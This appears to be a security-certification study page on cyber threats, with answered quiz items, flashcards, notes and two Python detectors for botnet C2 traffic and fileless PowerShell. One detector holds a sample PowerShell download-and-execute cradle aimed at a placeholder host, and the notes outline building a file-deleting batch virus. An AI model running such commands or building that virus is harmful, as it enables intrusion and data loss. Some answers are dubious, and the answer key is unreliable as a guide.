Understanding Cyber Threats


Questions and Answers

Which of the following best describes a 'threat' in the context of information security?

  • An individual or group attempting to exploit vulnerabilities.
  • A security measure implemented to protect against potential harm.
  • A weakness in a system that can be exploited.
  • The potential occurrence of an undesirable event that can damage or disrupt an organization's activities. (correct)

Which action is an example of an attacker performing privilege escalation?

  • Exploiting a vulnerability to gain unauthorized administrative rights. (correct)
  • Tricking an employee into divulging sensitive company information.
  • Causing a server to shut down unexpectedly.
  • Remotely altering data within a database server.

Which of the following threat sources is primarily associated with natural disasters?

  • Unintentional threats.
  • External threats.
  • Intentional threats.
  • Natural threats. (correct)

Which of the following describes an 'unstructured external threat'?

  • An unskilled attacker using freely available online tools, often out of curiosity. (correct)

What is the primary difference between a 'White Hat' and a 'Black Hat' hacker?

  • White Hats use their skills for defensive purposes with permission, while Black Hats use them for malicious purposes. (correct)

What motivates 'Cyber Terrorists' as threat actors?

  • Religious or political beliefs; they aim to create fear through large-scale disruption. (correct)

What is the main goal of 'Industrial Spies' as threat actors?

  • Stealing critical information from competitor organizations. (correct)

Which attribute best describes an 'Insider' threat actor?

  • They use privileged access to violate rules or cause harm to the organization. (correct)

Which of the following is considered a 'threat vector'?

  • A method used by an attacker to gain access to a system. (correct)

Which of the following scenarios is an example of using 'removable media' as a threat vector?

  • Plugging a USB drive containing malware into an organization's system. (correct)

Which of the following describes how the 'supply chain' can be a threat vector?

  • Attackers compromise a third-party vendor to target its customers. (correct)

What is the primary purpose of malware?

  • To damage or disable computer systems for theft or fraud. (correct)

Which of the following is a common way for malware to enter a system?

  • Downloading files from the Internet. (correct)

What is the purpose of a 'crypter' in the context of malware?

  • To conceal the existence of malware from antivirus detection. (correct)

Which component of malware defines the basic functionality that results in security breaches?

  • Malicious code. (correct)

What is the primary function of a Trojan?

  • To appear as a harmless program while performing malicious activities. (correct)

Which of the following is an indication of a Trojan attack?

  • The computer screen flips upside-down or is inverted. (correct)

How do attackers use Trojans to steal information?

  • By disabling firewalls and antivirus software. (correct)

What is a key characteristic of a virus?

  • It self-replicates by attaching itself to another program. (correct)

Which of the following is a common way a computer gets infected by viruses?

  • Opening infected email attachments. (correct)

Which type of virus infects Microsoft Word or similar applications by automatically performing a sequence of actions?

  • Macro virus. (correct)

What action does a 'sparse infector virus' typically take?

  • It infects less often to minimize the probability of discovery. (correct)

What is a key step in creating a simple virus program, as mentioned?

  • Converting a batch file into an executable file. (correct)

Which action cannot typically be performed once a virus file is built and executed using virus maker tools?

  • Improve system performance. (correct)

What is the primary action that 'ransomware' performs?

  • It restricts access to the computer's files and demands a ransom. (correct)

What is a key difference between a worm and a virus?

  • A worm replicates on its own and spreads across a network, whereas a virus must attach itself to a file or program. (correct)

What is the main goal of attackers who use botnets?

  • To perform distributed tasks, such as DDoS attacks, using compromised computers. (correct)

What defines 'fileless malware'?

  • It infects legitimate software and runs from memory. (correct)

Which of the following is a benefit attackers gain from using 'fileless malware'?

  • Stealth and evasion. (correct)

Which of the following is a propagation technique associated with fileless malware?

  • Using legitimate applications. (correct)

What is a key characteristic of a 'vulnerability'?

  • It is a weakness in an asset that can be exploited. (correct)

What can 'hardware/software misconfigurations' lead to?

  • Security loopholes. (correct)

Why is 'end-user carelessness' a concerning factor for network security?

  • Human behavior is susceptible to exploitation. (correct)

Why does lacking the latest updates make operating systems vulnerable?

  • Updates patch vulnerabilities and fix security flaws. (correct)

Which of the following is a likely impact caused by vulnerabilities?

  • Financial loss. (correct)

What does 'risk' refer to?

  • The potential loss that a threat can cause. (correct)

What are 'zero-day vulnerabilities'?

  • Vulnerabilities that are still unknown to the vendor or unpatched at the time they are exploited. (correct)

What term describes an organization accumulating more systems and server connections than it has documented or can track?

  • System sprawl. (correct)

Which scenario exemplifies an organization experiencing a 'threat' to its information security?

  • An employee accidentally deleting important customer data. (correct)

Which scenario is an example of an intentional, external threat?

  • A skilled hacker using advanced tools to gain unauthorized access to a network and disrupt services. (correct)

An untrained staff member clicks on a phishing email and inadvertently installs malware. Which type of threat source does this represent?

  • An unintentional threat. (correct)

A group of highly skilled hackers is hired by a competitor to steal trade secrets from a company. What type of threat actor are these hackers?

  • Industrial spies. (correct)

Which of the following best describes a 'Gray Hat' hacker?

  • An individual who works both offensively and defensively, sometimes helping identify vulnerabilities for vendors. (correct)

Which of the following threat actors is MOST likely to use defacement to promote their agenda?

  • Hacktivist. (correct)

An employee uses their access to sensitive company data to sell it to a competitor for personal gain. Which type of threat actor does this represent?

  • Insider. (correct)

Which of the following is a characteristic unique to 'Hacker Teams' compared with other threat actors?

  • They possess their own resources and funding, and work in synergy to research state-of-the-art technologies. (correct)

Which attack vector involves an attacker gaining physical access to a system to install malicious software?

  • Direct access. (correct)

An attacker exploits a vulnerability in a third-party vendor's software to compromise a target organization. Which threat vector does this represent?

  • Supply chain. (correct)

What is the PRIMARY risk associated with business partners as a threat vector?

  • Vulnerabilities in third-party organizations allowing attackers access to customer information. (correct)

An attacker injects malicious code into a virtual machine instance in a cloud environment to intercept user requests. Which threat vector is being used?

  • Cloud. (correct)

Which of the following actions performed by malware aims to slow down systems and degrade system performance?

  • Consuming excessive system resources and degrading system performance. (correct)

Which practice can best mitigate the entry of malware through portable hardware?

  • Scanning all removable media for malware before use. (correct)

What is the MOST likely action an attacker will take after successfully employing a 'Black Hat SEO' technique?

  • Tricking users into clicking on innocent-looking webpages to download malware. (correct)

What is the purpose of a 'downloader' in the context of malware?

  • To download other malware or malicious code from the Internet to a device. (correct)

An attacker embeds malware within a seemingly harmless file, which then covertly installs other malicious components on the system. What type of malware component is being used?

  • Dropper. (correct)

Which malware component is responsible for taking advantage of a system vulnerability to breach its security?

  • An exploit. (correct)

A program injects malicious code into other running processes to hide or prevent its removal. What component of malware is this program acting as?

  • Injector. (correct)

Which type of Trojan provides attackers with full control over the victim's system, enabling them to remotely access files and data?

  • A Remote Access Trojan (RAT). (correct)

A type of Trojan specifically targets financial information by intercepting account details before they are encrypted. Which type of Trojan is this?

  • An e-banking Trojan. (correct)

Which action is MOST indicative of a system infected with a rootkit Trojan?

  • The computer's antivirus software being disabled without any user action. (correct)

How do threat actors commonly distribute 'e-banking Trojans'?

  • Through malicious email attachments or advertisements. (correct)

A virus spreads by writing itself to disk as a COM file that runs before the EXE file of the same name launches. Which type of virus is this?

  • Companion virus. (correct)

A virus is designed to avoid detection by modifying its code with each replication but contains a constant decryption module. What type of virus is this?

  • Polymorphic virus. (correct)

Which of the following is a key difference between a direct-action virus and a terminate-and-stay-resident (TSR) virus?

  • A direct-action virus executes only when its host program runs and terminates when that program exits, whereas a TSR virus stays resident in memory. (correct)

Which of the following actions indicates a computer is likely infected with a virus?

  • The computer beeps with no display. (correct)

What is a key feature of the 'replication' stage of a virus lifecycle?

  • The virus replicates within the target system for a period and then spreads. (correct)

An employee downloads a pirated software program and installs it on their work computer, leading to a virus infection. Which factor contributed to this?

  • Downloading files from the Internet. (correct)

After writing a simple .bat virus, what step must be applied to the file before it can carry out its intended actions?

  • Convert the .bat file to a .com executable. (correct)

What happens immediately when a virus file built with a virus maker tool is executed?

  • It depends on the options selected in the virus maker tool. (correct)

A type of malware restricts access to a computer system's files and demands payment. What type of malware is this?

  • Ransomware. (correct)

When ransomware is delivered to victims through an email campaign, in what form do the ransom notes typically demand payment?

  • Bitcoin. (correct)

Which action best differentiates a worm from a virus?

  • Spreading through a network. (correct)

When a computer is connected to the Internet, what do worms use to spread?

  • The file or information transport features of the computer system. (correct)

What is the primary reason attackers use botnets?

  • To launch large-scale distributed attacks. (correct)

Which characteristic defines 'fileless malware'?

  • It operates without writing executable files to disk. (correct)

What is the key characteristic of fileless malware relating to the programs it infects?

  • It infects legitimate software applications. (correct)

An attacker injects malicious code that performs keylogging into a .docx document. Which fileless propagation technique does this fall under?

  • Legitimate applications. (correct)

What is indicated by a software application being identified as a PUA (Potentially Unwanted Application)?

  • It may pose risks to security and privacy, and/or may negatively impact system resources. (correct)

What is the MOST obvious indication of an adware infection?

  • Unsolicited advertisements and pop-ups start appearing while browsing. (correct)

What kind of information is typically recorded by a keylogger?

  • Email IDs, chat room activity, and keystrokes. (correct)

Which keylogger capability records the URLs a user has visited?

  • Monitoring visited URLs. (correct)

Which action would a 'bot' typically perform in a botnet?

  • Distribute malicious software that turns other computers into bots. (correct)

Which statement accurately describes the function of rootkits used by attackers?

  • Rootkits hide the attacker's presence and grant them full access to the host. (correct)

What is a common method used by attackers to place a rootkit on a system?

  • Social engineering, such as bundling the rootkit in a package like a game. (correct)

An organization's security team discovers several instances of unauthorized access to sensitive servers. Upon investigation, they find that many servers are running with default configurations. Which type of vulnerability is this an example of?

  • Default installations/default configurations. (correct)

A web server is misconfigured, allowing unauthorized users to list directory contents and gain access to sensitive files. Which area of vulnerability does this represent?

  • Internet service misconfiguration. (correct)

What best describes how 'design flaws' can make a system prone to risk?

  • The system does not adequately validate data, allowing attackers to bypass its detection mechanisms. (correct)

Given the potential for both intentional and unintentional harm to an organization, which of the following roles could pose the greatest threat if they misuse their network privileges?

  • A senior system administrator with broad network permissions. (correct)

In a scenario where a disgruntled employee is planning to leak sensitive company data to a competitor, which type of threat does this represent?

  • Intentional internal threat. (correct)

A security firm identifies a group of hackers using sophisticated tools and techniques to disrupt a nation's critical infrastructure. Which category of threat actor do they likely belong to?

  • Cyber terrorists. (correct)

An attacker gains unauthorized access to a company's network by exploiting a zero-day vulnerability in widely used software. How would you categorize this threat?

  • External threat. (correct)

An organization discovers that a partner company's compromised system was used to inject malware into their network through a shared data exchange process. What threat vector would you classify this as?

  • Supply chain. (correct)

A company's web server is compromised after an attacker exploits a vulnerability in a third-party library used by the website. Which threat vector does this represent?

  • Supply chain. (correct)

After successfully gaining access to a system, malware begins to disable security software and create backdoors for persistent access. What components are likely being used?

  • Injector and downloader. (correct)

Which of the following combinations of malware components would be MOST effective for an attacker aiming to exfiltrate sensitive data while remaining undetected?

  • Obfuscator, crypter, and rootkit. (correct)

A user reports that their computer screen is flickering and web pages are opening without any user interaction. Antivirus is disabled, and the mouse cursor moves erratically. What type of malware infection is indicated?

  • Trojan. (correct)

A user installs a program and then observes that their screensaver has been replaced with a scrolling advertisement. Which of the Trojan actions is most likely occurring?

  • Modifying system settings. (correct)

After creating a simple virus using a batch file, what must an attacker do to initiate the virus's replication and harmful actions on a target system?

  • Convert the .bat file into an executable (.exe or .com) file and then distribute it. (correct)

A user reports that all their files have been encrypted, and they are asked to send Bitcoin within 48 hours. What type of malware is most likely affecting this system?

  • Ransomware. (correct)

Which action taken by a worm is MOST indicative of its propagation method, differentiating it from a virus?

  • Exploiting a vulnerability in the operating system to replicate itself. (correct)

An organization detects a sudden surge in network traffic originating from numerous internal systems, all communicating with a single external command server. Which malware type is likely responsible?

  • Botnet. (correct)
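The fan-in pattern in the scenario above (many internal hosts all talking to one external endpoint) can be checked directly against flow records. The Python below is an added example written for this page, not code from the lesson or from any product: the NetFlow-style record format, the use of RFC 1918 space to define "internal", and the threshold of five distinct sources are its own assumptions, and the sample flows are constructed.

```python
"""Flag external endpoints with unusual fan-in from internal hosts (botnet C2 pattern).

Added example, not from the original lesson. Flow records below are constructed
in a simplified, hypothetical "timestamp src dst dst_port bytes" text format.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# RFC 1918 space is treated as internal; everything else as external (assumption).
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample flows: six internal hosts check in to 203.0.113.5:443 within
# seconds (the C2 pattern); two hosts fetch from 198.51.100.20 (a normal download);
# one internal-to-internal SMB flow that must be ignored.
SAMPLE_FLOWS = """\
2024-05-01T10:00:01 10.0.0.11 203.0.113.5 443 512
2024-05-01T10:00:02 10.0.0.12 203.0.113.5 443 498
2024-05-01T10:00:02 10.0.0.13 203.0.113.5 443 530
2024-05-01T10:00:03 10.0.0.14 203.0.113.5 443 501
2024-05-01T10:00:03 10.0.0.15 203.0.113.5 443 515
2024-05-01T10:00:04 10.0.0.16 203.0.113.5 443 507
2024-05-01T10:00:05 10.0.0.11 198.51.100.20 443 40210
2024-05-01T10:00:06 10.0.0.12 198.51.100.20 443 38771
2024-05-01T10:00:07 10.0.0.21 10.0.0.5 445 9000
"""


def is_internal(ip):
    """True if the address falls in one of the configured internal ranges."""
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flows(text):
    """Parse the constructed flow format into a list of dicts."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, nbytes = line.split()
        flows.append({"ts": ts, "src": src, "dst": dst,
                      "port": int(port), "bytes": int(nbytes)})
    return flows


def find_c2_candidates(flows, min_sources=5):
    """Return {"dst:port": [sources]} for external endpoints reached by at
    least min_sources distinct internal hosts.

    Bots all check in to the same C2 server, so one external endpoint suddenly
    has fan-in from many internal sources. Internal-to-internal flows are
    skipped because internal services legitimately have many clients.
    """
    sources_by_dst = defaultdict(set)
    for f in flows:
        if is_internal(f["src"]) and not is_internal(f["dst"]):
            sources_by_dst[(f["dst"], f["port"])].add(f["src"])
    return {
        f"{dst}:{port}": sorted(srcs)
        for (dst, port), srcs in sorted(sources_by_dst.items())
        if len(srcs) >= min_sources
    }


if __name__ == "__main__":
    for endpoint, sources in find_c2_candidates(parse_flows(SAMPLE_FLOWS)).items():
        print(f"possible C2 {endpoint}: {len(sources)} internal hosts -> {sources}")
```

Fan-in alone also matches CDNs, update servers and SaaS endpoints, so in practice the hit list is filtered against known destinations and combined with beacon periodicity and the uniform small request sizes that C2 check-ins tend to show.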

An attacker successfully injects malicious code into a running instance of PowerShell to download and execute arbitrary commands without writing any files to disk. Which technique is being used?

  • Fileless malware. (correct)
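Because the scenario above leaves no file to scan, detection has to work from the process command line (or script-block logging) instead. The Python below is an added example for this page, not code from the lesson or any vendor's rule set: it scores constructed PowerShell command lines against a small, weighted indicator list, decoding any -EncodedCommand argument first so that a base64-hidden download cradle is scored like a plaintext one. The indicator patterns, weights and the alert threshold are the author's assumptions.

```python
"""Score PowerShell command lines for fileless-malware indicators.

Added example, not from the original lesson. The command lines below are
constructed to resemble process-creation log entries; the indicator list and
weights are assumptions, not a vendor rule set.
"""
import base64
import re

# Weighted indicators. Each is harmless alone (admins use -NoProfile and
# Invoke-WebRequest too), so the combination is scored rather than any one match.
INDICATORS = {
    "encoded_command": (re.compile(r"(?i)(?:^|\s)-e(?:c|n\w*)?\b"), 2),
    "invoke_expression": (re.compile(r"(?i)\bIEX\b|Invoke-Expression"), 3),
    "download_cradle": (re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\biwr\b"), 3),
    "hidden_window": (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2),
    "bypass_policy": (re.compile(r"(?i)-e(?:xecutionpolicy|xec|p)\s+bypass"), 2),
    "base64_in_script": (re.compile(r"(?i)FromBase64String"), 2),
    "reflective_load": (re.compile(r"(?i)Reflection\.Assembly\]::Load"), 3),
}
# -e, -ec, -enc, -EncodedCommand ... followed by the base64 blob.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]+)")

# Constructed samples. The first is the classic download cradle hidden behind
# -EncodedCommand (PowerShell expects base64 of UTF-16LE), built here so the
# example is self-contained.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand {_ENCODED}",
    'powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.7/a.ps1\')"',
    r"powershell.exe -File C:\scripts\backup.ps1",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "Get-Service"',
]


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmdline, threshold=4):
    """Score one command line. The decoded payload is scanned as well, because
    the cradle is invisible in the raw line once it is base64-encoded."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline} {decoded}"
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[name][1] for name in hits)
    return {"score": score, "indicators": hits,
            "suspicious": score >= threshold, "decoded": decoded}


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = score_command_line(line)
        flag = "ALERT" if r["suspicious"] else "ok   "
        print(f"{flag} score={r['score']:>2} {r['indicators']} :: {line[:60]}")
```

On a real estate the same logic is run over Sysmon Event ID 1 or Windows 4688 command lines and over 4104 script blocks; the latter catch the case where the cradle is assembled from string fragments at runtime and never appears whole on any command line.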

Which of the following is the most common method used to trick users into installing a Potentially Unwanted Application (PUA)?

  • Bundling it with freeware downloads. (correct)

An employee reports that a program installed on their computer is constantly displaying intrusive pop-up ads, even when the browser is closed. What specific type of PUA is most likely causing this?

  • Adware. (correct)

Which setting in a web browser, when enabled, would a keylogger be MOST likely to record and transmit to an attacker?

  • Saved login credentials. (correct)

An internal phishing campaign reveals that several employees are not changing default passwords on newly provisioned devices. How does this misconfiguration directly increase the systems' vulnerability?

  • It enables easy brute-force attacks. (correct)

An organization discovers that a critical database server was left running with default settings by a junior technician as a result of inexperience. Given the impact of this setting on the organization's overall risk posture, how should this misconfiguration be categorized?

  • High, due to the ease of exploitation. (correct)

Flashcards

What is a Threat?

The potential for an undesirable event to damage and disrupt an organization.

Examples of Threats

Stealing data, causing shutdowns, tricking employees, or infecting systems

Threat Sources

Natural events, unintentional errors, or intentional attacks.

Natural Threats

Fires, floods, power failures, etc.

Unintentional Threats

Errors by untrained employees, accidents, negligence and breaches that insiders cause without malicious intent.

Intentional Threats

Deliberate harmful actions, either internal or external.

Internal Threats

Disgruntled employees or other insiders performing attacks.

External Threats

Outside attackers exploiting network vulnerabilities without insider help.

Structured External Threats

Attacks by technically skilled attackers using tools, with disruptive, criminal or political motives.

Unstructured External Threats

Attacks by unskilled attackers, often driven by curiosity.

Black Hats

Individuals with extraordinary computer skills who launch malicious attacks.

White Hats

Individuals who use hacking skills for defensive security purposes, with permission.

Gray Hats

Those who hack both defensively and offensively at various times.

Suicide Hackers

Hackers who bring down infrastructure for a cause, unconcerned about the consequences.

Script Kiddies

Unskilled hackers using scripts and tools written by others, lacking specific goals.

Cyber Terrorists

Motivated by religious or political beliefs, causing large-scale disruption.

State-Sponsored Hackers

Government-employed hackers aiming to steal top-secret information.

Hacktivist

Promotes a political or social agenda, e.g. by defacing websites.

Hacker Teams

Teams of skilled hackers with their own resources, working on state-of-the-art technology.

Industrial Spies

Those who perform corporate espionage, stealing competitors' information (formulas, blueprints).

Insiders

Trusted insiders with access to critical assets who violate rules or cause harm.

Criminal Syndicates

Organized groups that embezzle money through cybercrime.

Organized Hackers

Miscreants using rented botnets to steal money.

Threat Vector

A medium or path an attacker uses to reach and exploit vulnerabilities.

Direct Access

Physical access to a system in order to modify it.

Removable Media

USB drives, phones, printers and similar devices spreading malware.

Wireless

Compromised hotspots, credential cracking or spoofing.

Email

Phishing attacks using malicious attachments or links.

Cloud

Malware injected into cloud services.

Ransomware/Malware

Exploiting unpatched system vulnerabilities.

Supply Chain

Exploiting third-party vendor vulnerabilities.

Business Partners

Third parties with access to customer data.

Introduction to Malware

Malicious software that damages or takes control of computer systems.

Ways for Malware to Enter

The various methods that let malicious software enter a system.

Crypter

Software that conceals malware to evade antivirus detection.

Downloader

Downloads other malware from the Internet.

Dropper

Delivers and installs malware covertly.

Exploit

Code that takes advantage of a bug or vulnerability to breach security.

Injector

Injects malicious code into running processes.

Obfuscator

Conceals malicious code via techniques that make it difficult to analyze.

Packer

Compresses malware into an unreadable format.

Payload

The part of malware that carries out the intended malicious activity.

Malicious Code

Code comprising commands that cause security breaches.

What is a Trojan?

Malware that seems harmless but contains malicious code.

Black Hat SEO

Aggressive SEO tactics that get malware pages ranked highly by search engines.

Social Engineered Click-jacking

Deceiving users into clicking through legitimate-looking pages.

Spear-phishing Sites

Sites imitating trusted institutions to steal data.

Malvertising

Embedding malware into ads on high-traffic sites.

Drive-by Downloads

Software downloaded unintentionally, typically via exploited browser flaws.

Compromised Legitimate Websites

Malware served from compromised legitimate web pages.

Spam Emails

Malicious files attached to emails.

Study Notes

What is a Threat?

  • A threat is a potential event that is undesirable and could damage or disrupt an organization's operations.
  • Attackers use cyber threats to infiltrate systems and steal data, including personal, financial, and login credentials.

Examples of Threats

  • Attackers may steal sensitive data.
  • Attackers may cause servers to shut down.
  • Attackers may trick employees into revealing sensitive information.
  • Attackers may infect systems with malware.
  • Attackers may spoof the identity of authorized personnel.
  • Attackers may modify or tamper with network data.
  • Attackers may remotely alter database servers.
  • Attackers may perform URL redirection or forwarding.
  • Attackers may perform privilege escalation for unauthorized access.
  • Attackers may execute denial-of-service (DoS) attacks.
  • Attackers may eavesdrop on communication channels without authorization.

Threat Sources

  • Threat sources can be natural, unintentional, or intentional.
  • Natural threats include fires, floods, and power failures, which can cause physical damage.
  • Unintentional threats arise from insider errors: accidents, negligence, unskilled administrators, and breaches caused without malicious intent.
  • Intentional threats can be internal, performed by insiders like disgruntled employees, or external, performed by outside attackers.
  • Structured external threats are implemented by technically skilled attackers using various tools.
  • Criminal bribes, racism, politics, and terrorism are motivators for structured external threats.
  • Unstructured external threats are implemented by unskilled attackers, often out of curiosity rather than criminal intent, using freely available tools.
  • Because such attackers rely on freely available, noisy port-scanning and address-sweeping tools, standard security controls can usually detect and prevent unstructured external threats.

Threat Actors and Agents

  • Black hats use extraordinary computing skills for illegal activities and are known as crackers.
  • White hats or penetration testers use hacking skills for defensive purposes with permission from the system owner.
  • Gray hats work both offensively and defensively, sometimes helping vendors improve products.
  • Suicide hackers aim to disrupt critical infrastructure for a cause and are not concerned with punishment.
  • Script kiddies are unskilled hackers using tools developed by others to gain popularity or prove technical skills.
  • Cyber terrorists are motivated by religious or political beliefs to disrupt computer networks.
  • State-sponsored hackers are employed by governments to penetrate and damage information systems of other governments, and gather intelligence.
  • Industrial spies perform corporate espionage to steal critical information from competitor organizations.
  • Insiders are employees who misuse privileged access for malicious purposes.
  • Hacker teams are skilled hackers working together with their own funding.
  • Criminal syndicates are involved in organized cyber-attacks and money laundering.
  • Hacktivists use hacking to promote social or political agendas, and deface or disable websites.
  • Organized hackers use rented devices or botnets to perform cyber attacks, pilfering money and selling information.

Threat Vectors

  • Direct access involves gaining physical access to a target system for malicious activities.
  • Removable media like USB drives can become a threat vector for malware.
  • Wireless networks can be compromised, especially if they are unsecured.
  • Email is used for phishing attacks where attachments or links compromise the target.
  • Attackers can inject malware into cloud resources to access user information.
  • Ransomware and other malware can take advantage of unpatched vulnerabilities.
  • Attackers can compromise the target by exploiting vulnerabilities in third-party vendor resources.
  • Business partners can be exploited in supply-chain attacks to access customer information.

Malware

  • Malware stands for malicious software.
  • Attackers may use malware to gain unauthorized access to systems or data.
  • Malware can damage or disable computer systems.
  • Malware gives limited or full control of a system to the malware creator.
  • Malware is typically used for theft or fraud.
  • Programmers create malware to attack browsers, track visited websites, slow down systems, cause hardware failure and steal information.

Distribution Techniques

  • Attackers distribute malware through black hat SEO, social engineering, spear-phishing sites, malvertising, compromised websites, drive-by downloads, and spam emails.
  • Black hat SEO is the use of aggressive SEO tactics to achieve higher search engine rankings for malware pages.
  • Social engineering is the insertion of malware into websites to trick users into executing it unknowingly.
  • Spear-phishing involves mimicking trusted entities to steal sensitive information.
  • Malvertising spreads malware through malicious advertisements.
  • Drive-by downloads install software without the user's intent by exploiting browser flaws.
  • Attackers can use compromised websites to infect systems with malware.
  • Spam emails attach malicious files to compromise machines.

Components of Malware

  • Crypters conceal the existence of malware and protect it from antivirus detection.
  • Downloaders download additional malicious code from the internet.
  • Droppers embed malware files and deliver them to a target, installing them before execution.
  • Exploits use code that takes advantage of bugs or vulnerabilities to breach system security.
  • Injectors inject exploits or malicious code into running processes.
  • Obfuscators conceal the malicious code of malware.
  • Packers compress malware files into an unreadable format.
  • Payloads perform the desired malicious activity when activated.
  • Malicious code defines the basic malware functionality, and comprises commands resulting in security breaches in the form of Java Applets, ActiveX Controls, Browser Plug-ins and Pushed Content.

Types of Trojans

  • Remote access Trojans (RATs) provide attackers full control over the victim's system.
  • Backdoor Trojans bypass standard system authentication.
  • Botnet Trojans infect a large number of computers for a command-and-control center.
  • Rootkit Trojans attack the root or OS and are hard to detect.
  • E-banking Trojans intercept a victim's account information, targeting online banking.
  • Point-of-sale (POS) Trojans target POS equipment to steal credit card data.
  • Service protocol Trojans exploit vulnerable service protocols.
  • Defacement Trojans can destroy or change the content of a database and target websites for modification.
  • Mobile Trojans target mobile phones to steal various credentials/data.
  • IoT Trojans attack IoT networks using a botnet.
  • Security software disabler Trojans stop security programs.
  • Destructive Trojans randomly delete files for malicious reasons.
  • DDoS Attack Trojans perform DDoS attacks on target machines.
  • Command Shell Trojans provide remote control of a command shell.

Creating a Virus

  • Creating a simple virus program involves writing a batch file with commands to copy itself and delete Windows files.
  • The Game.bat batch file is converted into Game.com using the bat2com utility.
  • Executing the virus copies it to other batch files before wiping the target folder.
  • Virus Maker tools allow quick customization of viruses, including disabling Windows features or infecting files.

What is a Virus?

  • A virus is a self-replicating program that produces its own copy by attaching itself to programs, boot sectors, or documents.
  • Viruses spread via file downloads, infected disks/flash drives and email.
  • Key characteristics of viruses are: infects other programs, transforms itself, encrypts itself, alters data, corrupts files/programs, replicates itself.

Types of Viruses

  • System or Boot Sector Viruses target the system's boot sectors and can spread via email and removable media.
  • File Viruses infect files executed or interpreted in the system.
  • Multipartite Viruses attack both the boot sector and executable files.
  • Macro Viruses infect Microsoft Word or similar applications.
  • Cluster Viruses infect files without changes but alter directory entries.
  • Stealth/Tunneling Viruses hide from antivirus software by altering service call interrupts.
  • Encryption Viruses penetrate systems via various means, using an encrypted copy of the virus with a decryption module.
  • Sparse Infector Viruses infect less often to minimize detection.
  • Polymorphic Viruses modify their code for each replication to avoid detection.
  • Overwriting File or Cavity Viruses overwrite parts of host files without changing the file size.
  • Companion Viruses store themselves with the same filename, infecting the system upon execution.
  • Shell Viruses form a shell around the target host program's code.
  • File Extension Viruses change the extensions of files.
  • FAT Viruses attack the File Allocation Table.
  • Logic Bomb Viruses trigger in response to a specific event.

More Virus Types

  • Web Scripting Viruses breach web browser security for client-side scripting.
  • Email Viruses perform unexpected actions.
  • Add-on Viruses append their code to the host code without changes.
  • Armored Viruses are designed to confuse antivirus systems.
  • Direct Action/Transient Viruses take over all control of the host code.
  • Terminate/Stay Resident Viruses remain permanently in the target machine's memory.
  • Intrusive Viruses overwrite the host code completely or partly with the viral code.

More on Virus Creation

  • A simple virus program can be written using a batch file.
  • Virus maker tools can perform harmful tasks.

Ransomware

  • Ransomware restricts access to a computer's system files and folders.
  • Payment of a ransom is demanded to remove the restrictions.
  • Dharma is ransomware used in targeted campaigns that demands payment in bitcoins.

eCh0raix Ransomware

  • The following is a list of known ransomware: eCh0raix, SamSam, WannaCry, Petya/NotPetya, GandCrab, MegaCortex, LockerGoga, NamPoHyu, Ryuk, Cryptgh0st.

Computer Worms

  • Computer worms replicate, execute and spread on their own, consume system resources, require no user interaction, and can install backdoors for attackers.
  • A worm takes advantage of file or information transport features on computer systems and spreads automatically through the infected network, whereas a virus does not.
  • The core differences between a virus and a worm: a worm exploits vulnerabilities rather than modifying stored programs, consumes network bandwidth, spreads rapidly, and is removed easily.

Rootkits

  • Rootkits hide presence and activities, allowing full access to the server or host.
  • Rootkits replace system calls and utilities with versions that perform malicious functions.
  • A rootkit comprises backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots.

How to use Rootkits

  • Attackers install rootkits by scanning for vulnerable computers, wrapping the rootkit in a special package, installing it on public or corporate computers, and launching a zero-day attack.
  • Rootkits are used to conceal activity on the host system, mask attacker tracks, gather data, and store programs.
  • Scranos is a trojanized rootkit that masquerades as other software to infect systems and exfiltrate data; LoJax is another popular rootkit.
  • LoJax is used to inject malware into the boot sector, where it is hard to detect, and maintains persistence even after OS reinstallation.
  • Its tools access system settings and the SPI (Serial Peripheral Interface) flash memory and embed a UEFI module into the firmware image.

Potentially Unwanted Applications (PUAs)

  • Potentially Unwanted Applications are also known as grayware or junkware.
  • They can pose severe risks to data security on the systems where they are installed.
  • They can be installed along with downloaded third-party installers.
  • Types of PUA include adware, torrent applications, marketing applications, cryptomining software and dialers.

Adware Characteristics

  • Indicators of adware include frequent system lag, a flood of advertisements, incessant system crashes, a changed browser home page, slow web browsing and a slow Internet connection caused by background activity.
  • Adware consumes memory and processor capacity, which slows the system.
  • New browser toolbars or add-ons appear that the user did not install.
  • Adware displays unrequested advertisements in pop-ups.

Spyware

  • Spyware is a stealthy program that records the user's interaction with the computer and the Internet and reports it back.
  • It hides itself on the target in order to avoid removal.
  • Spyware propagation methods include drive-by downloads, masquerading as anti-spyware, browser exploits, piggybacking on software installations, and cookies.
  • Spyware activities include stealing information, monitoring user activity, and displaying annoying pop-ups.

Common Keylogging Activities

  • Keyloggers record every keystroke.
  • They log window titles and the names of applications in use.
  • They monitor and record login names and credit card data, and capture records of online chats.

Types of Keyloggers

  • Spyrix and Refog are keyloggers for Windows and Mac that spy on every keystroke.

Botnets

  • A botnet is a network of computers controlled by a central computer.
  • Attackers distribute software that enlists infected computers into the network.

Types of Malware

  • Fileless malware infects legitimate software, operates in RAM by leveraging existing vulnerabilities, and can inject code.
